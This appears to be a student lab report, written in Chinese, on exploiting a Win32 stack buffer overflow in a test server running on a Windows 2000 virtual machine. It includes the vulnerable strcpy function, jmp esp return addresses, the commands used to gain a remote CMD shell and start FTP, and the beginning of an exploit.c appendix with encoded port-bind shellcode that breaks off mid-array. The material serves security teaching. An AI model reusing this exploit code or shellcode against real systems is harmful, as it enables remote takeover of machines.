网络安全缓冲区溢出技术实验报告.doc

网络实验报告 学生姓名 学号 组员： 实验项目 Windows缓冲区溢出测试 一、实验目的及要求 1、目的 了解和掌握Win32平台缓冲区溢出原理； 学会使用Win32平台Shellcode技术。 2、内容及要求 以windows 2000 server虚拟机为测试对象，修改server.cpp和exploit.c，利用shellcode port bind给出的shellcode,远程获得CMD,并启动目标机器的ftp服务。 二、仪器用具 计算机（分别装有windows server 2000和windows 7操作系统）mware8.0在同一台电脑上面安装两个操作系统。 三、实验方法与步骤 在实验开始前，首先编写可能产生缓冲区溢出的程序(server.cpp)和测试程序(exploit.c)。 在server.cpp中能够产生缓冲区溢出的程序片段如下： void overflow(char * s,int size) { char s1[50]; printf(receive %d bytes,size); s[size]=0; strcpy(s1,s); } 这两个程序的完整代码见附件。 由于本实验是在虚拟机环境下测试的，所以在开始实验前，分别记下两个系统的IP地址： 运行server程序的系统IP地址为：31 运行exploit程序的系统IP地址为： 实验的过程如下： 在windows2000系统下分别编译server.cpp和exploit.c程序，详细过程如下： C:\testcl server.cpp C:\testcl exploit.c 编译完成后分别产生exploit.exe、exploit.obj、server.exe、server.obj 截图如下图1所示： 图 1 在windows2000系统中运行服务程序：server.cpp C:\testserver.exe 截图如下： 图 2 将编译好的exploit程序拷贝到windows 7系统中来测试 在windows 7系统中运行exploit.exe程序，如下 D:\client\exploit.exe 31 8888 截图如下： 3 这样就可以获得目标主机的CMD了，接下来的任务是开启目标主机的FTP服务。 紧接着上面的步骤，在获得CMD的情况下，运行如下的命令来开启目标机器的FTP服务 C:\testnet start “ftp publishing service” 截图如下： 4 四、实验结果 从上面的截图可以看出，实验通过exploit.exe程序顺利的获取了目标机器的CMD并启动FTP服务#define JUMPESP的定义。windows2000下可以采用如下的定义： #define JUMPESP \x12\x45\xfa\x7f windows xp sp2可以采用下面的定义： #define JUMPESP \xed\x1e\x96\x7c 由于程序是使用VC6编译器来编译的，它保持4字节栈对齐，因此服务程序server.cpp并不需要任何改动。 五、附录 exploit.c程序代码 #include stdio.h #include stdlib.h #include windows.h #pragma comment (lib,ws2_32) // jmp esp address of chinese version #define JUMPESP \x12\x45\xfa\x7f char shellcode[] = \xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x23\x01\x80\x34\x0b\xf8\xe2\xfa \xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\xf8\xf8\xa7\x9c\x59\xc8 \xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92 \xfb\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f \x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfd\xa1\x10\x78\xf8\xf8\xf8 \x1a\x01\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae \xf4\xa8\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe8\x73\x20\xcb\x38 \xa8\xa8\x90\xfa\xf8\xe